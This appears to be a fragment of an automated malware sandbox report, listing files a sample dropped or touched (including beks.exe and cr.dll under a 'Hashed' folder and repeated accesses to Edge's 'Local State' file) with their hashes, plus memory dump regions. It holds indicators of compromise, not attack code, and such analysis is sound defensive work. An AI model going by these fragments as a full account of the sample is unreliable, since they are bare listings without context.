8300acce75f3882d484ebb58c57ee7b0f0cbeeac7eb31ebd00c4e71cd2e80f56

SHA512
4147fe036a3ed0e852b888088a44fb90828c09323f707675676bcb55910a5499208970e565f152df5ec5aaf530bf08644cf3b8d0ba28f0fdf9fe39d5cfd978ec

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
14a276647e27fb42945bec09e6b2c155

SHA1
4730718d96ad310051d49ff111239b221de0528b

SHA256
2bff4e966a3f5f0cc8bde35e37d89ee3dfd03fac73a892ccb2239bf509a592f0

SHA512
3092249682c3dcb7efa04fdca9527b42c6aa6dd635914e885a228afaf9c7a8d9576c5fa59a8d0ef88e2dcae3ad436368f5b47c4a562ed3f65185f8df43855184

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
3705e0e054d77ccbbf1338d38dc7216d

SHA1
04fcd0e464b8bf153cd78ff798d6e69525654772

SHA256
d30f009ead0fc0af27cf3c50c261256b6d75b1db7d62284e22249771e85ce9cc

SHA512
fe3ed44a0196da125023e0819e6866df29c8fa41ba65bc69562309107ffa8c84aad47d22a5d8f27350b66afafa31982f58fca1dff25bdba38444e3fc46c13318

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
54e191c5ece39d3a26ee357acd7b3248

SHA1
73f2180b7457aa3869489af4d0a26427f9c7394b

SHA256
dea3a821c5316bbe6805c9e44160c5a66251f1c8f0d20f03ea7058c78489b0bc

SHA512
d3b3cd12af18b624490a937c0ae720b3f6b36054056bd8efd9ff6505428c9fd1bc264291a95cb3bfc2ce080553d8351e9dee6c973bfb67fa1b3da1ad951721ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lycnh20d.1s1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Hashed\beks.exe

Filesize
4.8MB

MD5
02a3ff6cf40a59890512e2199c3a3256

SHA1
ab40be16054aeb4329b365d7ccc3f62d214522dc

SHA256
a539405f9e4c86ce4ade7fdfe39ecc2da493083654f5cd6662bb14b9bbb9ca53

SHA512
f5fc68275c9d9ae0e0c3d9a6f20bc05a9e2c58ffe8f82798d7cd4df1115386a774459460fe375a03b48af17bdc663b5136743c5fa6e6ff85b2758f69fc80b599

Download Submit
C:\Users\Admin\AppData\Roaming\Hashed\cr.dll

Filesize
5.7MB

MD5
2a53c7f50b074db464f7dacfcbad3be8

SHA1
37061b97ecf311c6165832293f55928fc31dd0c4

SHA256
ee5c5dd1aee927a6bcb8e390a0d2c5adcda66da5ec9e7d41b22014dd3181e793

SHA512
2384285ebbcc43a409f4cbec20e7e129502804683b1274d1a087e83289523fa9ba6b74243eaa96bd051fb072e16facc5bbbffde818aaa2857cd66463c43199b2

Download Submit
memory/1116-190-0x000001FFA62F0000-0x000001FFA62F1000-memory.dmp

Filesize
4KB

Download
memory/1116-188-0x000001FFA62F0000-0x000001FFA62F1000-memory.dmp

Filesize
4KB

Download
memory/1116-183-0x000001FFA62F0000-0x000001FFA62F1000-memory.dmp

Filesize
4KB

Download
memory/1116-182-0x000001FFA62F0000-0x000001FFA62F1000-memory.dmp

Filesize
4KB

Download
memory/1116-193-0x000001FFA62F0000-0x000001FFA62F1000-memory.dmp

Filesize
4KB

Download
memory/1116-192-0x000001FFA62F0000-0x000001FFA62F1000-memory.dmp

Filesize
4KB

Download
memory/1116-191-0x000001FFA62F0000-0x000001FFA62F1000-memory.dmp

Filesize
4KB

Download
memory/1116-187-0x000001FFA62F0000-0x000001FFA62F1000-memory.dmp

Filesize
4KB

Download
memory/1116-189-0x000001FFA62F0000-0x000001FFA62F1000-memory.dmp

Filesize
4KB

Download
memory/1116-181-0x000001FFA62F0000-0x000001FFA62F1000-memory.dmp

Filesize
4KB

Download
memory/3872-156-0x0000000074C60000-0x0000000075225000-memory.dmp

Filesize
5.8MB

Download
memory/3872-155-0x0000000000900000-0x0000000000DDF000-memory.dmp

Filesize
4.9MB

Download
memory/3872-144-0x0000000001BA0000-0x0000000001BFA000-memory.dmp

Filesize
360KB

Download
memory/3872-143-0x0000000001BA0000-0x0000000001BFA000-memory.dmp

Filesize
360KB

Download
memory/4908-127-0x0000019E77C80000-0x0000019E77C92000-memory.dmp

Filesize
72KB

Download
memory/4908-126-0x0000019E77C50000-0x0000019E77C5A000-memory.dmp

Filesize
40KB

Download
memory/4908-124-0x0000019E78050000-0x0000019E787F6000-memory.dmp

Filesize
7.6MB

Download
memory/4908-99-0x0000019E77530000-0x0000019E77552000-memory.dmp

Filesize
136KB

Download